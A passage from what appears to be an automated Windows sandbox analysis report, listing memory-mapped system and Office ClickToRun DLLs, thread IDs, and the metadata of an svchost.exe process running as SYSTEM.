files\\microsoft shared\\clicktorun\\appvfilesystemmetadata.dll") Region: id = 2637 start_va = 0x7ffc49a20000 end_va = 0x7ffc49ba5fff entry_point = 0x7ffc49a20000 region_type = mapped_file name = "appvisvsubsystemcontroller.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystemcontroller.dll") Region: id = 2638 start_va = 0x7ffc49e20000 end_va = 0x7ffc4a052fff entry_point = 0x7ffc49e20000 region_type = mapped_file name = "appvintegration.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll") Region: id = 2639 start_va = 0x7ffc4a060000 end_va = 0x7ffc4a0f7fff entry_point = 0x7ffc4a060000 region_type = mapped_file name = "appvisvvirtualization.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvvirtualization.dll") Region: id = 2640 start_va = 0x7ffc4a100000 end_va = 0x7ffc4a17ffff entry_point = 0x7ffc4a100000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 2641 start_va = 0x7ffc4a180000 end_va = 0x7ffc4a229fff entry_point = 0x7ffc4a180000 region_type = mapped_file name = "appvcatalog.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcatalog.dll") Region: id = 2642 start_va = 0x7ffc4a230000 end_va = 0x7ffc4a361fff entry_point = 0x7ffc4a230000 region_type = mapped_file name = "appvmanifest.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvmanifest.dll") Region: id = 2643 start_va = 0x7ffc4a4a0000 end_va = 0x7ffc4a4d6fff entry_point = 0x7ffc4a4a0000 region_type = mapped_file name = "appvisvstreamingmanager.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstreamingmanager.dll") Region: id = 2644 start_va = 0x7ffc4a5c0000 end_va = 0x7ffc4a6affff entry_point = 0x7ffc4a5c0000 region_type = mapped_file name = "appvorchestration.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvorchestration.dll") Region: id = 2645 start_va = 0x7ffc4a6b0000 end_va = 0x7ffc4a6c6fff entry_point = 0x7ffc4a6b0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2646 start_va = 0x7ffc4a6d0000 end_va = 0x7ffc4a7befff entry_point = 0x7ffc4a6d0000 region_type = mapped_file name = "msvcr120.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcr120.dll") Region: id = 2647 start_va = 0x7ffc4a7c0000 end_va = 0x7ffc4a865fff entry_point = 0x7ffc4a7c0000 region_type = mapped_file name = "msvcp120.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp120.dll") Region: id = 2648 start_va = 0x7ffc4a870000 end_va = 0x7ffc4a9b0fff entry_point = 0x7ffc4a870000 region_type = mapped_file name = "appvpolicy.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvpolicy.dll") Region: id = 2649 start_va = 0x7ffc4a9c0000 end_va = 0x7ffc4aa3bfff entry_point = 0x7ffc4a9c0000 region_type = mapped_file name = "appvisvapi.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvapi.dll") Region: id = 2650 start_va = 0x7ffc4aa60000 end_va = 0x7ffc4aae1fff entry_point = 0x7ffc4aa60000 region_type = mapped_file name = "msdelta.dll" filename = "\\Windows\\System32\\msdelta.dll" (normalized: "c:\\windows\\system32\\msdelta.dll") Region: id = 2651 start_va = 0x7ffc4aaf0000 end_va = 0x7ffc4aec1fff entry_point = 0x7ffc4aaf0000 region_type = mapped_file name = "streamserver.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\streamserver.dll") Region: id = 2652 start_va = 0x7ffc4b090000 end_va = 0x7ffc4b09dfff entry_point = 0x7ffc4b090000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 2653 start_va = 0x7ffc4b290000 end_va = 0x7ffc4b536fff entry_point = 0x7ffc4b290000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 2654 start_va = 0x7ffc4b540000 end_va = 0x7ffc4b6d6fff entry_point = 0x7ffc4b540000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 2655 start_va = 0x7ffc4b6e0000 end_va = 0x7ffc4b6ebfff entry_point = 0x7ffc4b6e0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2656 start_va = 0x7ffc4b890000 end_va = 0x7ffc4b899fff entry_point = 0x7ffc4b890000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2657 start_va = 0x7ffc4b8c0000 end_va = 0x7ffc4b8d4fff entry_point = 0x7ffc4b8c0000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 2658 start_va = 0x7ffc4b930000 end_va = 0x7ffc4bc6cfff entry_point = 0x7ffc4b930000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 2659 start_va = 0x7ffc4c220000 end_va = 0x7ffc4c25efff entry_point = 0x7ffc4c220000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 2660 start_va = 0x7ffc4c270000 end_va = 0x7ffc4c279fff entry_point = 0x7ffc4c270000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 2661 start_va = 0x7ffc4cbd0000 end_va = 0x7ffc4ce43fff entry_point = 0x7ffc4cbd0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 2662 start_va = 0x7ffc4cec0000 end_va = 0x7ffc4cefbfff entry_point = 0x7ffc4cec0000 region_type = mapped_file name = "apiclient.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll") Region: id = 2663 start_va = 0x7ffc4d9d0000 end_va = 0x7ffc4daa5fff entry_point = 0x7ffc4d9d0000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 2664 start_va = 0x7ffc4dad0000 end_va = 0x7ffc4db01fff entry_point = 0x7ffc4dad0000 region_type = mapped_file name = "rstrtmgr.dll" filename = "\\Windows\\System32\\RstrtMgr.dll" (normalized: "c:\\windows\\system32\\rstrtmgr.dll") Region: id = 2665 start_va = 0x7ffc4db10000 end_va = 0x7ffc4dbb6fff entry_point = 0x7ffc4db10000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp140.dll") Region: id = 2666 start_va = 0x7ffc4dbc0000 end_va = 0x7ffc4dbd5fff entry_point = 0x7ffc4dbc0000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vcruntime140.dll") Region: id = 2667 start_va = 0x7ffc4ddd0000 end_va = 0x7ffc4e145fff entry_point = 0x7ffc4ddd0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 2668 start_va = 0x7ffc4f660000 end_va = 0x7ffc4f686fff entry_point = 0x7ffc4f660000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 2669 start_va = 0x7ffc4fb00000 end_va = 0x7ffc4fb35fff entry_point = 0x7ffc4fb00000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 2670 start_va = 0x7ffc50400000 end_va = 0x7ffc504f1fff entry_point = 0x7ffc50400000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 2671 start_va = 0x7ffc50980000 end_va = 0x7ffc509e7fff entry_point = 0x7ffc50980000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2672 start_va = 0x7ffc50a50000 end_va = 0x7ffc50a69fff entry_point = 0x7ffc50a50000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2673 start_va = 0x7ffc50a70000 end_va = 0x7ffc50a85fff entry_point = 0x7ffc50a70000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2674 start_va = 0x7ffc50ec0000 end_va = 0x7ffc50ed7fff entry_point = 0x7ffc50ec0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 2675 start_va = 0x7ffc514b0000 end_va = 0x7ffc514c5fff entry_point = 0x7ffc514b0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2676 start_va = 0x7ffc51c30000 end_va = 0x7ffc51c3afff entry_point = 0x7ffc51c30000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2677 start_va = 0x7ffc51c50000 end_va = 0x7ffc51c87fff entry_point = 0x7ffc51c50000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2678 start_va = 0x7ffc52640000 end_va = 0x7ffc52652fff entry_point = 0x7ffc52640000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2679 start_va = 0x7ffc534a0000 end_va = 0x7ffc534c2fff entry_point = 0x7ffc534a0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2680 start_va = 0x7ffc53720000 end_va = 0x7ffc53777fff entry_point = 0x7ffc53720000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2681 start_va = 0x7ffc53830000 end_va = 0x7ffc5383bfff entry_point = 0x7ffc53830000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2682 start_va = 0x7ffc53840000 end_va = 0x7ffc53865fff entry_point = 0x7ffc53840000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2683 start_va = 0x7ffc53980000 end_va = 0x7ffc539f3fff entry_point = 0x7ffc53980000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 2684 start_va = 0x7ffc53a90000 end_va = 0x7ffc53ac2fff entry_point = 0x7ffc53a90000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2685 start_va = 0x7ffc53b80000 end_va = 0x7ffc53b9efff entry_point = 0x7ffc53b80000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2686 start_va = 0x7ffc53be0000 end_va = 0x7ffc53c87fff entry_point = 0x7ffc53be0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2687 start_va = 0x7ffc53dd0000 end_va = 0x7ffc53e2cfff entry_point = 0x7ffc53dd0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2688 start_va = 0x7ffc53f30000 end_va = 0x7ffc53f65fff entry_point = 0x7ffc53f30000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 2689 start_va = 0x7ffc53f70000 end_va = 0x7ffc53f95fff entry_point = 0x7ffc53f70000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 2690 start_va = 0x7ffc541f0000 end_va = 0x7ffc541f9fff entry_point = 0x7ffc541f0000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 2691 start_va = 0x7ffc54210000 end_va = 0x7ffc54226fff entry_point = 0x7ffc54210000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2692 start_va = 0x7ffc54280000 end_va = 0x7ffc5428afff entry_point = 0x7ffc54280000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2693 start_va = 0x7ffc54320000 end_va = 0x7ffc5434bfff entry_point = 0x7ffc54320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2694 start_va = 0x7ffc543a0000 end_va = 0x7ffc543c7fff entry_point = 0x7ffc543a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2695 start_va = 0x7ffc543d0000 end_va = 0x7ffc5443afff entry_point = 0x7ffc543d0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2696 start_va = 0x7ffc54580000 end_va = 0x7ffc54592fff entry_point = 0x7ffc54580000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2697 start_va = 0x7ffc545a0000 end_va = 0x7ffc545e9fff entry_point = 0x7ffc545a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2698 start_va = 0x7ffc545f0000 end_va = 0x7ffc54600fff entry_point = 0x7ffc545f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2699 start_va = 0x7ffc54610000 end_va = 0x7ffc5461efff entry_point = 0x7ffc54610000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2700 start_va = 0x7ffc54620000 end_va = 0x7ffc54663fff entry_point = 0x7ffc54620000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2701 start_va = 0x7ffc54670000 end_va = 0x7ffc54c97fff entry_point = 0x7ffc54670000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2702 start_va = 0x7ffc54ca0000 end_va = 0x7ffc54cf3fff entry_point = 0x7ffc54ca0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 2703 start_va = 0x7ffc54db0000 end_va = 0x7ffc54f70fff entry_point = 0x7ffc54db0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2704 start_va = 0x7ffc54f80000 end_va = 0x7ffc55032fff entry_point = 0x7ffc54f80000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2705 start_va = 0x7ffc55040000 end_va = 0x7ffc5521cfff entry_point = 0x7ffc55040000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2706 start_va = 0x7ffc55280000 end_va = 0x7ffc552b5fff entry_point = 0x7ffc55280000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2707 start_va = 0x7ffc552c0000 end_va = 0x7ffc5535cfff entry_point = 0x7ffc552c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2708 start_va = 0x7ffc55380000 end_va = 0x7ffc554dbfff entry_point = 0x7ffc55380000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2709 start_va = 0x7ffc554e0000 end_va = 0x7ffc5562dfff entry_point = 0x7ffc554e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2710 start_va = 0x7ffc55630000 end_va = 0x7ffc557f4fff entry_point = 0x7ffc55630000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2711 start_va = 0x7ffc55800000 end_va = 0x7ffc558acfff entry_point = 0x7ffc55800000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2712 start_va = 0x7ffc55910000 end_va = 0x7ffc559cdfff entry_point = 0x7ffc55910000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2713 start_va = 0x7ffc559d0000 end_va = 0x7ffc56ef4fff entry_point = 0x7ffc559d0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2714 start_va = 0x7ffc56f00000 end_va = 0x7ffc56f07fff entry_point = 0x7ffc56f00000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2715 start_va = 0x7ffc56f10000 end_va = 0x7ffc57094fff entry_point = 0x7ffc56f10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2716 start_va = 0x7ffc570a0000 end_va = 0x7ffc571c5fff entry_point = 0x7ffc570a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2717 start_va = 0x7ffc571d0000 end_va = 0x7ffc5744bfff entry_point = 0x7ffc571d0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2718 start_va = 0x7ffc57450000 end_va = 0x7ffc57456fff entry_point = 0x7ffc57450000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 2719 start_va = 0x7ffc57540000 end_va = 0x7ffc5759afff entry_point = 0x7ffc57540000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2720 start_va = 0x7ffc57750000 end_va = 0x7ffc57890fff entry_point = 0x7ffc57750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2721 start_va = 0x7ffc578a0000 end_va = 0x7ffc578f0fff entry_point = 0x7ffc578a0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2722 start_va = 0x7ffc57900000 end_va = 0x7ffc57968fff entry_point = 0x7ffc57900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2723 start_va = 0x7ffc57970000 end_va = 0x7ffc57a14fff entry_point = 0x7ffc57970000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2724 start_va = 0x7ffc57a20000 end_va = 0x7ffc57a27fff entry_point = 0x7ffc57a20000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 2725 start_va = 0x7ffc57aa0000 end_va = 0x7ffc57b45fff entry_point = 0x7ffc57aa0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2726 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 392 os_tid = 0xa54 Thread: id = 393 os_tid = 0xa64 Thread: id = 394 os_tid = 0x78c Thread: id = 395 os_tid = 0x768 Thread: id = 396 os_tid = 0x724 Thread: id = 397 os_tid = 0x720 Thread: id = 398 os_tid = 0x714 Thread: id = 399 os_tid = 0x6f8 Thread: id = 400 os_tid = 0x6e8 Thread: id = 401 os_tid = 0x6cc Thread: id = 402 os_tid = 0x69c Thread: id = 403 os_tid = 0x640 Thread: id = 404 os_tid = 0x630 Thread: id = 405 os_tid = 0x62c Thread: id = 406 os_tid = 0x5f4 Thread: id = 407 os_tid = 0x568 Thread: id = 408 os_tid = 0x4c8 Thread: id = 469 os_tid = 0xe40 Thread: id = 474 os_tid = 0xe5c Thread: id = 475 os_tid = 0xe54 Process: id = "17" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x5cfa000" os_pid = "0x678" os_integrity_level = "0x4000" os_privileges = "0x260814080" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k appmodel" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EntAppSvc" [0xa], "NT SERVICE\\StateRepository" [0xa], "NT SERVICE\\tiledatamodelsvc" [0xe], "NT SERVICE\\WalletService" [0xa], "NT AUTHORITY\\Logon Session 00000000:00015bd3" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1706 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1707 start_va = 0xda80000000 end_va = 0xda8fffffff entry_point = 0x0 region_type = private name = "private_0x000000da80000000" filename = "" Region: id = 1708 start_va = 0xdae5db0000 end_va = 0xdae5dbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dae5db0000" filename = "" Region: id = 1709 start_va = 0xdae5dc0000 end_va = 0xdae5dc0fff entry_point = 0xdae5dc0000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1710 start_va = 0xdae5dd0000 end_va = 0xdae5de3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dae5dd0000" filename = "" Region: id = 1711 start_va = 0xdae5df0000 end_va = 0xdae5e6ffff entry_point = 0x0 region_type = private name = "private_0x000000dae5df0000" filename = "" Region: id = 1712 start_va = 0xdae5e70000 end_va = 0xdae5e73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dae5e70000" filename = "" Region: id = 1713 start_va = 0xdae5e80000 end_va = 0xdae5e80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dae5e80000" filename = "" Region: id = 1714 start_va = 0xdae5e90000 end_va = 0xdae5e91fff entry_point = 0x0 region_type = private name = "private_0x000000dae5e90000" filename = "" Region: id = 1715 start_va = 0xdae5ea0000 end_va = 0xdae5f5dfff entry_point = 0xdae5ea0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1716 start_va = 0xdae5f60000 end_va = 0xdae5f6ffff entry_point = 0xdae5f60000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1717 start_va = 0xdae5f70000 end_va = 0xdae5f7ffff entry_point = 0xdae5f70000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1718 start_va = 0xdae5f80000 end_va = 0xdae5f8ffff entry_point = 0xdae5f80000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1719 start_va = 0xdae5f90000 end_va = 0xdae5f90fff entry_point = 0x0 region_type = private name = "private_0x000000dae5f90000" filename = "" Region: id = 1720 start_va = 0xdae5fa0000 end_va = 0xdae5faffff entry_point = 0xdae5fa0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1721 start_va = 0xdae5fc0000 end_va = 0xdae5fcffff entry_point = 0xdae5fc0000 region_type = mapped_file name = "vedatamodel.edb" filename = 